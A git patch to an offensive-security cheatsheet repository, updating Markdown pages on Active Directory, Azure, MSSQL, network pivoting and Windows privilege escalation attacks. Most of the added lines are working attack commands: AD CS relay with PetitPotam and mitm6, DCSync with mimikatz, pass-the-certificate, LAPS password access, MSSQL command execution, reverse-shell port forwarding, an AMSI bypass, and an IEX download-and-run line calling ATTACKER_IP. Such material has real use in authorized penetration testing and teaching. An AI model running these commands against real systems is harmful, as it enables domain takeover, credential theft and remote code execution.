From 3066615cde55f9cd6755ed81a7d83c229f78e397 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 31 May 2022 11:57:44 +0200
Subject: [PATCH] LAPS Access + Pass the Cert + Writeable folder

---
 .../Active Directory Attack.md | 164 +++++++++++-------
 .../Cloud - Azure Pentest.md | 14 +-
 Methodology and Resources/Escape Breakout.md | 1 +
 .../MSSQL Server - Cheatsheet.md | 30 +++-
 .../Network Pivoting Techniques.md | 12 +-
 .../Windows - Privilege Escalation.md | 45 +++--
 6 files changed, 186 insertions(+), 80 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 6d904ec9..79fe4360 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -82,6 +82,7 @@
 - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
 - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
 - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
+ - [Pass-The-Certificate](#pass-the-certificate)
 - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
 - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
 - [GenericAll](#genericall)
@@ -230,13 +231,13 @@ Use the correct collector
 # run the collector on the machine using SharpHound.exe
 # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
 # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
- .\SharpHound.exe -c all -d active.htb -SearchForest
- .\SharpHound.exe --EncryptZip --ZipFilename export.zip
- .\SharpHound.exe -c all,GPOLocalGroup
+ .\SharpHound.exe -c all -d active.htb --searchforest
+ .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
+ .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
+ .\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder
- .\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100
+ .\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb
 .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
- .\SharpHound.exe -c all,GPOLocalGroup --searchforest
 
 # or run the collector on the machine using Powershell
 # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
@@ -1466,7 +1467,15 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
 ```bash
 ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
 ```
-
+
+#### Grant LAPS Access
+The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
+
+```ps1
+Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
+Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
+```
+
 ### Reading GMSA Password
@@ -2230,7 +2239,9 @@ secretsdump.py -k -no-pass target.lab.local
 
 ### Active Directory Certificate Services
 
-* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
+* Find ADCS Server
+ * `crackmapexec ldap domain.lab -u username -p password -M adcs`
+ * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
 * Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
 
 #### ESC1 - Misconfigured Certificate Templates
@@ -2247,8 +2258,10 @@ Exploitation:
 ```ps1
 Certify.exe find /vulnerable
 Certify.exe find /vulnerable /currentuser
- or
+ # or
 PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
+ # or
+ certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
 ```
 * Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
 ```ps1
@@ -2394,64 +2407,75 @@ Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /
 Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
 
-* Version 1: NTLM Relay + Rubeus + PetitPotam
- ```powershell
- impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs
- impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
- # For a member server or workstation, the template would be "Computer".
- # Other templates: workstation, DomainController, Machine, KerberosAuthentication
+* **Version 1**: NTLM Relay + Rubeus + PetitPotam
+ ```powershell
+ impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs
+ impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
+ # For a member server or workstation, the template would be "Computer".
+ # Other templates: workstation, DomainController, Machine, KerberosAuthentication
 
- # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
- # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
- git clone https://github.com/topotam/PetitPotam
- python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
- python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
- python3 dementor.py -u -p -d
- python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
+ # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
+ # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
+ git clone https://github.com/topotam/PetitPotam
+ python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
+ python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
+ python3 dementor.py -u -p -d
+ python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
 
- # Use the certificate with rubeus to request a TGT
- Rubeus.exe asktgt /user: /certificate: /ptt
- Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
+ # Use the certificate with rubeus to request a TGT
+ Rubeus.exe asktgt /user: /certificate: /ptt
+ Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
 
- # Now you can use the TGT to perform a DCSync
- mimikatz> lsadump::dcsync /user:krbtgt
- ```
+ # Now you can use the TGT to perform a DCSync
+ mimikatz> lsadump::dcsync /user:krbtgt
+ ```
 
-* Version 2: NTLM Relay + Mimikatz + Kekeo
- ```powershell
- impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+* **Version 2**: NTLM Relay + Mimikatz + Kekeo
+ ```powershell
+ impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
 
- # Mimikatz
- mimikatz> misc::efs /server:dc.lab.local /connect: /noauth
+ # Mimikatz
+ mimikatz> misc::efs /server:dc.lab.local /connect: /noauth
 
- # Kekeo
- kekeo> base64 /input:on
- kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt
+ # Kekeo
+ kekeo> base64 /input:on
+ kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt
 
- # Mimikatz
- mimikatz> lsadump::dcsync /user:krbtgt
- ```
-* Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
- ```powershell
- https://github.com/bats3c/ADCSPwn
- adcspwn.exe --adcs --port [local port] --remote [computer]
- adcspwn.exe --adcs cs.pwnlab.local
- adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
- adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
- adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
+ # Mimikatz
+ mimikatz> lsadump::dcsync /user:krbtgt
+ ```
 
- # ADCSPwn arguments
- adcs - This is the address of the AD CS server which authentication will be relayed to.
- secure - Use HTTPS with the certificate service.
- port - The port ADCSPwn will listen on.
- remote - Remote machine to trigger authentication from.
- username - Username for non-domain context.
- password - Password for non-domain context.
- dc - Domain controller to query for Certificate Templates (LDAP).
- unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
- output - Output path to store base64 generated crt.
- ```
-* Version 4: Certipy ESC8
+* **Version 3**: Kerberos Relay
+ ```ps1
+ # Setup the relay
+ sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
+
+ # Run mitm6
+ sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
+ ```
+
+* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
+ ```powershell
+ https://github.com/bats3c/ADCSPwn
+ adcspwn.exe --adcs --port [local port] --remote [computer]
+ adcspwn.exe --adcs cs.pwnlab.local
+ adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
+ adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
+ adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
+
+ # ADCSPwn arguments
+ adcs - This is the address of the AD CS server which authentication will be relayed to.
+ secure - Use HTTPS with the certificate service.
+ port - The port ADCSPwn will listen on.
+ remote - Remote machine to trigger authentication from.
+ username - Username for non-domain context.
+ password - Password for non-domain context.
+ dc - Domain controller to query for Certificate Templates (LDAP).
+ unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
+ output - Output path to store base64 generated crt.
+ ```
+
+* **Version 5**: Certipy ESC8
 ```ps1
 certipy relay -ca 172.16.19.100
 ```
@@ -2496,6 +2520,29 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
 ```
 
+#### Pass-The-Certificate
+
+* Windows
+ ```ps1
+ # Information about a cert file
+ certutil -v -dump admin.pfx
+
+ # From a Base64 PFX
+ Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
+ ```
+* Linux
+ ```ps1
+ # Base64-encoded PFX certificate (string) (password can be set)
+ gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+ ​
+ # PEM certificate (file) + PEM private key (file)
+ gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+
+ # PFX certificate (file) + password (string, optionnal)
+ gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+ ```
+
+
 ### Dangerous Built-in Groups Usage
 
 If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
@@ -2516,6 +2563,7 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
 ([adsisearcher]"(AdminCount=1)").findall()
 ```
 
+
 #### AdminSDHolder Abuse
 
 > The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index 65dc4d77..54e598dc 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md
+++ b/Methodology and Resources/Cloud - Azure Pentest.md
@@ -3,6 +3,7 @@
 ## Summary
 
 * [Azure Recon Tools](#azure-recon-tools)
+* [Terminology](#terminology)
 * [Enumeration](#enumeration)
 * [Enumerate valid emails](#enumerate-valid-emails)
 * [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
@@ -179,7 +180,17 @@
 # Administrator
 $ Create-Backdoor, Execute-Backdoor
 ```
+
+## Terminology
+
+> Basic Azure AD terminologies
+
+* **Tenant**: An instance of Azure AD and represents a single organization.
+* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources.
+* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory.
+* **Core Domain**: The initial domain name .onmicrosoft.com is the core domain. It is possible to define custom domain names too.
+
 ## Enumeration
 
 ### Enumerate valid emails
@@ -1115,4 +1126,5 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
 * [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
 * [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
 * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
-* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
\ No newline at end of file
+* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
+* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)
\ No newline at end of file
diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md
index 5604fc82..b66a7378 100644
--- a/Methodology and Resources/Escape Breakout.md
+++ b/Methodology and Resources/Escape Breakout.md
@@ -146,3 +146,4 @@ firefox irc://127.0.0.1 -P "Test"
 * [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
 * [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
 * [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
+* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
\ No newline at end of file
diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md
index 860d5b0f..2a5744d6 100644
--- a/Methodology and Resources/MSSQL Server - Cheatsheet.md
+++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md
@@ -163,12 +163,14 @@ A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
 ```ps1
 Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
+select * from master..sysservers
 ```
 
 ### Crawl Links for a Specific Instance
 
 ```ps1
 Get-SQLServerLinkCrawl -Instance "" -Verbose
+select * from openquery("",'select * from openquery("",''select * from master..sysservers'')')
 ```
 
 ### Query Version of Linked Database
@@ -286,12 +288,21 @@ Prerequisites:
 * CREATE ASSEMBLY permission (or)
 * ALTER ASSEMBLY permission (or)
 
+The execution takes place with privileges of the **service account**.
+
 ### Execute commands using CLR assembly
 
 ```ps1
+# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
+Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop
+
+# Execute command using CLR assembly
+Invoke-SQLOSCmdCLR -Username sa -Password -Instance -Command "whoami" -Verbose
 Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose
-or
 Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose
+
+# List all the stored procedures added using CLR
+Get-SQLStoredProcedureCLR -Instance -Verbose
 ```
 
 ### Manually creating a CLR DLL and importing it
@@ -385,6 +396,7 @@ GO
 ## OLE Automation
 
 * :warning: Disabled by default
+* The execution takes place with privileges of the **service account**.
 
 ### Execute commands using OLE automation procedures
 
@@ -418,6 +430,9 @@ SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
 
 ## Agent Jobs
 
+* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
+* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
+
 ### Execute commands through SQL Agent Job service
 
 ```ps1
@@ -461,12 +476,21 @@ RECONFIGURE;
 
 ```ps1
 Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose
+
+EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
+WITH RESULT SETS (([cmd_out] nvarchar(max)))
 ```
 
 ## R
 
 ```ps1
 Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose
+
+EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
+WITH RESULT SETS (([cmd_out] text));
+GO
+
+@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
 ```
 
 ## Audit Checks
@@ -491,8 +515,10 @@ powerpick Get-SQLQuery -Instance "" -Query "EXECUTE AS
 
 ## Find databases that have been configured as trustworthy
 
-```ps1
+```sql
 Invoke-SQLAuditPrivTrustworthy -Instance "" -Exploit -Verbose
+
+SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
 ```
 
 > The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 39e40aa5..e65d3a21 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
@@ -30,8 +30,17 @@
 ```powershell
 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
-
 netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
+
+# Forward the port 4545 for the reverse shell, and the 80 for the http server for example
+netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
+netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
+# Correctly open the port on the machine
+netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
+netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
+netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
+netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
+
 ```
 
 1. listenaddress – is a local IP address waiting for a connection.
@@ -446,3 +455,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
 * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
 * [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
 * [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
+* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index ffcc86bd..bbf93c75 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md
+++ b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -315,15 +315,15 @@ netsh Advfirewall set allprofiles state off
 ### AppLocker Enumeration
 
 - With the GPO
-- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
-
+- `HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2` (Keys: Appx, Dll, Exe, Msi and Script).
 * List AppLocker rules
 ```powershell
 PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
 ```
-* Applocker Bypass
+* AppLocker Bypass
+ * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users
 * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
 * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
 * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
@@ -337,23 +337,20 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell
 ```
 
-Powershell Constrained Mode
+#### Powershell Constrained Mode
 
-```powershell
-# Check if we are in a constrained mode
-$ExecutionContext.SessionState.LanguageMode
+* Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
+* [bypass-clm - PowerShell Constrained Language Mode Bypass](https://github.com/calebstewart/bypass-clm)
+* [PowerShdll - Powershell with no Powershell.exe via DLL's](https://github.com/p3nt4/PowerShdll): `rundll32.exe C:\temp\PowerShdll.dll,main`
+* Other bypasses
+ ```powershell
+ PS > &{ whoami }
+ powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
+ ```
 
-PS > &{ whoami }
-powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
+#### AMSI Bypass
 
-# PowerShDLL - Powershell with no Powershell.exe via DLL’s
-# https://github.com/p3nt4/PowerShdll
-ftp> rundll32.exe C:\temp\PowerShdll.dll,main
-```
-
-
-
-Example of AMSI Bypass.
+Find more AMSI bypass: [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
 
 ```powershell
 PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@@ -365,10 +362,22 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
 ```powershell
 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
 C:\Windows\System32\spool\drivers\color
-C:\Windows\Tasks
+C:\Windows\System32\spool\printers
+C:\Windows\System32\spool\servers
 C:\Windows\tracing
 C:\Windows\Temp
 C:\Users\Public
+C:\Windows\Tasks
+C:\Windows\System32\tasks
+C:\Windows\SysWOW64\tasks
+C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
+C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
+C:\Windows\debug\wia
+C:\Windows\registration\crmlog
+C:\Windows\System32\com\dmp
+C:\Windows\SysWOW64\com\dmp
+C:\Windows\System32\fxstmp
+C:\Windows\SysWOW64\fxstmp
 ```
 
 ## EoP - Looting for passwords